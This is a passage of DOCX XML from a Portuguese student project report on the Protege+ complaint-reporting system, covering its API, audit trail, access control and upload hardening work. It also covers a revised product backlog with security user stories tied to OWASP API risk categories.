        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Os 25 testes que cobrem essa frente, 14 no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EstatisticaServiceTest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e 11 no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RelatorioServiceTest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, trazem no cabeçalho de cada método o valor esperado calculado à mão e a conta que o produziu. Estatística errada é o tipo de defeito que não quebra o sistema: ele apenas faz o sistema mentir, silenciosamente, com aparência de normalidade.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Há ainda um teste que fixa uma lição aprendida em campo: o carimbo de tempo dos registros precisa ser truncado a milissegundos, porque a JVM tem precisão de nanossegundos e a coluna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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do banco não. Sem o truncamento, o hash calculado antes de gravar não bate com o recalculado na leitura, e o sistema acusa adulteração onde houve apenas perda de precisão. O teste existe para que ninguém remova o truncamento sem entender o porquê (seção 5.4.6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="Xb852cfb8105438b9fc40be9dc218e2b534191f8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.10 Endereçamento das ressalvas das fases anteriores</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As avaliações anteriores apontaram cinco pontos. Todos foram incorporados ao planejamento desta fase, e cada um tem destino declarado neste documento.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8"/>
        <w:gridCol w:w="2891"/>
        <w:gridCol w:w="2891"/>
        <w:gridCol w:w="150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Ressalva recebida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nesta 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Scripts DDL não podem ficar apenas em link de repositório; precisam estar documentados e explicados no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DDL comentado bloco a bloco, com a justificativa de cada decisão não óbvia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Anexo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Corrigir a tipagem genérica de campos no diagrama físico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Precisão explícita em todo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">NUMBER</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, remoção de coluna redundante com a FK, revisão do uso de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CLOB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A.1 e A.9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Faltou o detalhamento do modelo físico gerado no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 reescrito: 12 tabelas, 11 FK, 6 UNIQUE, 30 CHECK, 13 índices, 30 comentários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Faltou a análise do limite de ~5 MB do</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">localStorage</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">frente ao upload em Base64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Analisado na seção 1.4 e resolvido pela migração para upload via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1.4 e 3.2.3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Faltou demonstrar o console Java rodando em paralelo com o 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Demonstrado no vídeo, em tela dividida, com o terminal do back-end ao lado do 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Vídeo, link na capa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X9f1dd2a8cc1ae6ab08efee34f75b2ad395a52d2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.11 Registro cronológico das evoluções desta fase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Além do que já existia ao iniciar a Fase 5, foram implementados e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">verificados contra a aplicação em execução</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API RESTful completa.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CRUD de denúncias, equipe e evidências, com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e cabeçalho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204 No Content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e a distinção correta entre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(sintaxe),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(regra de negócio violada),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(não autenticado) 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(perfil insuficiente), conforme a semântica definida pelo RFC 9110 (IETF, 2022). Filtros e paginação resolvidos no banco, e não com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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sobre a coleção inteira em memória.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Três respostas distintas para o mesmo recurso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A listagem do painel deixou de trafegar o relato completo e o endereço de dezenas de vítimas apenas para desenhar um Kanban.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Erros deixaram de vazar informação.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A versão anterior devolvia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ex.getMessage()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no corpo do erro 500, e mensagens de exceção carregam nome de tabela, de coluna e trecho de SQL. Agora o detalhe fica no log do servidor e o cliente recebe um código de rastreio de oito caracteres.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Estruturas de dados na lógica do sistema.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fila de prioridade em heap binário para a ordem de atendimento e pilha LIFO para o histórico reversível de ações, ambas expostas por endpoints próprios e visíveis na interface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Segregação de acesso real.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cinco perfis, aplicados por rota e por campo, com o perfil lido do token assinado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Trilha de auditoria encadeada por hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, cobrindo onze ações sensíveis em quinze endpoints, com verificação de integridade que aponta o elo rompido e distingue alteração de remoção.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endurecimento da API.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CORS por lista de origens no lugar do curinga com credenciais habilitadas, e limite de requisições por origem nas rotas públicas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Manipulação de arquivos.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Upload por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, com tipo verificado pela assinatura do conteúdo, nome gerado por UUID, armazenamento fora da pasta pública, hash SHA-256 reconferido na leitura, download auditado e remoção com motivo obrigatório, seguindo integralmente as quatro recomendações da OWASP para upload de arquivos (OWASP, [s.d.]c).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Exportação em CSV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com mascaramento por perfil, sem o relato, auditada, e com neutralização de injeção de fórmula.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Relatório estatístico completo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, calculado no servidor por um serviço puro e exibido em seis gráficos, com a leitura de cada um gerada a partir dos próprios números.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modelo físico Oracle reescrito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com tipagem explícita e chave natural nas tabelas de domínio, o que faz o script documentado ser o mesmo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que a aplicação usa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Integração efetiva do portal e do painel à API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a correção mais importante da fase, descrita na seção 3.3.2, e a origem da user story US31.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="síntese-da-parte-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.12 Síntese da Parte 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A Fase 5 não acrescentou telas ao Protege+: ela mudou o que está por baixo delas. O sistema que se entrega aqui tem servidor, banco, autenticação real, controle de acesso por perfil, trilha de auditoria verificável, tratamento de arquivos hostis e uma análise estatística que aponta um problema operacional concreto na própria base, e não apenas confirma o que se esperava encontrar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="67" w:name="parte-2-ajustes-no-backlog"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PARTE 2: Ajustes no backlog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O que o enunciado pede</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“Reavalie o Product Backlog criado nas fases anteriores e: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Atualize-o com novas user stories relacionadas ao front-end, segurança e manipulação de arquivos.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Escreva os critérios de aceitação das user stories prioritárias.”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada uma das exigências tem seções próprias: a reavaliação do backlog das fases anteriores está em 2.1, 2.2 e 2.3; as novas user stories em 2.4 a 2.7, separadas exatamente nas três categorias pedidas (front-end, segurança e manipulação de arquivos); e os critérios de aceitação das histórias prioritárias em 2.8. A seção 2.9 acrescenta a definição de pronto, e a 2.10 consolida o backlog final em um quadro único.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="44" w:name="método-de-revisão"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Método de revisão</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A revisão do backlog seguiu uma regra deliberada:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cada história foi avaliada pelo seu estado real no código, não pela intenção declarada na fase em que foi escrita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na prática, isso significa que uma história só permaneceu marcada como concluída se foi possível apontar o arquivo, a rota ou a tela que a implementa, e executá-la. Três histórias que constavam como concluídas na Fase 4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">voltaram para o backlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ao serem submetidas a esse critério (seção 2.3), e uma história inteiramente nova nasceu da revisão (US31, seção 2.7).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Foi uma revisão desconfortável e produtiva. Backlog que só cresce para a direita, em que nada volta, é backlog que registra intenções, não estado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="product-backlog-revisado-us01-a-us18"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Product Backlog revisado (US01 a US18)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33"/>
        <w:gridCol w:w="2661"/>
        <w:gridCol w:w="1267"/>
        <w:gridCol w:w="335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 (resumo)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após a Fase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Cidadão registra denúncia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Concluída</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, agora persistida via</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/denuncias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Denúncia anônima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Concluída e ampliada</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: anonimato graduado em 3 níveis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Informar local do incidente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visualiza painel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Concluída</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Kanban, backlog e mapa, alimentados pela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e hora das denúncias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Preenchimento por GPS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Relato em áudio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Reaberta e concluída</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: upload via API (US28)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Anexar fotos e documentos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Reaberta e concluída</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: mesma dependência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QR Code do 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Compartilhar link do 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avançados no backlog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Concluída e migrada para o servidor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: resolvidos no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Histórico de status rastreável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Concluída</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: persistido com</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@OrderColumn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Mapa de distribuição geográfica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Concluída com k-anonimato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em inglês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Concluída e ampliada</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: 363 chaves simétricas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seguro (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">Fake Page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claro e escuro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 React do formulário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Reaberta e concluída</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: integrado à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e sanitização de entradas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Concluída e estendida ao servidor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">com Bean Validation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justificativa-das-reaberturas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Justificativa das reaberturas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">US07 e US08, os anexos.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Foram entregues na Fase 4 gravando o arquivo em Base64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Essa solução esbarra no teto de armazenamento do navegador, cresce cerca de 33 % sobre o tamanho original do arquivo e não sobrevive à troca de dispositivo. A entrega correta é o upload via API, tratado na US28 e implementado nesta fase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">US17, o componente React.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Existia como arquivo isolado e não estava incorporado ao projeto: nenhum caminho da aplicação levava até ele, e ele não conversava com servidor nenhum. A reintegração é o que o transforma de protótipo em parte do sistema. E, como o enunciado desta fase pede explicitamente a demonstração do consumo de endpoints por uma interface React, essa história deixou de ser opcional.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vale o registro metodológico: as três reaberturas não decorrem de defeito de implementação, e sim de uma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">definição de pronto insuficiente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nas fases anteriores. É por isso que a seção 2.9 formaliza uma definição de pronto que teria barrado as três.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="novas-user-stories-de-front-end"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 Novas user stories de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">front-end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3"/>
        <w:gridCol w:w="5280"/>
        <w:gridCol w:w="1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auditor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero consultar a trilha de auditoria filtrada por período, usuário e tipo de ação, para investigar o uso indevido do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atendente</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero ver a fila de priorização automática das denúncias, para atender primeiro o caso mais grave e mais antigo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gestor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero desfazer a última movimentação feita no Kanban, para corrigir um erro operacional sem apagar o histórico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usuário do painel</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero saber se estou conectado à API ou operando em modo local, para saber se posso confiar no dado que estou vendo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gestor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero um painel estatístico com tempo médio de resposta e sua dispersão, para avaliar a performance do atendimento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gestor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero abrir a ficha completa de um caso a partir do painel, para trabalhar a denúncia sem precisar consultá-la pelo canal público do cidadão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odyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A US32 nasceu de uma constatação simples e incômoda durante a verificação: o botão</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ver detalhes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do painel levava o gestor à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tela pública de consulta por protocolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a mesma que o cidadão usa. O efeito colateral era grave: como aquela tela usa o DTO público, o gestor nunca acessava o endpoint de detalhe, e portanto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">a ação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CONSULTA_SENSIVEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nunca era disparada a partir da interface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Uma trilha de auditoria que registra a leitura do relato, mas cuja interface não passa pelo caminho que a registra, é uma trilha decorativa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="novas-user-stories-de-segurança"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5 Novas user stories de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">segurança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3"/>
        <w:gridCol w:w="5280"/>
        <w:gridCol w:w="1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administrador</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero perfis com permissões distintas, para que cada servidor acesse apenas o que sua função exige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auditor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero que toda ação sensível gere um registro imutável e encadeado, para que a trilha não possa ser adulterada sem deixar rastro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encarregado de dados</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero que dados pessoais sejam mascarados conforme o perfil que consulta, para reduzir a exposição desnecessária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gestor de segurança</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero limitar tentativas de login e envios por IP, para evitar ataques de força bruta e o abuso do canal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auditor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, quero que as tentativas de acesso</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">recusadas</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">também apareçam na trilha, para identificar sondagem de permissões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</w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As quatro primeiras não são invenção deste projeto: elas correspondem, uma a uma, a riscos catalogados pela OWASP para APIs. A US24 endereça</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API1:2023 Broken Object Level Authorization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API5:2023 Broken Function Level Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; a US26,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API3:2023 Broken Object Property Level Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, categoria que absorveu a antiga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Excessive Data Exposure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; e a US27,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API4:2023 Unrestricted Resource Consumption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP, 2023). A US25 responde ao controle 8.15 (Logging) da ISO/IEC 27002:2022 (ISO/IEC, 2022) e à orientação da ANPD de que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a auditoria registra o que foi feito pelo usuário</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ANPD, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A US33 é consequência direta de uma lacuna encontrada em teste. A anotação</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@Auditavel</w:t>
      </w:r>
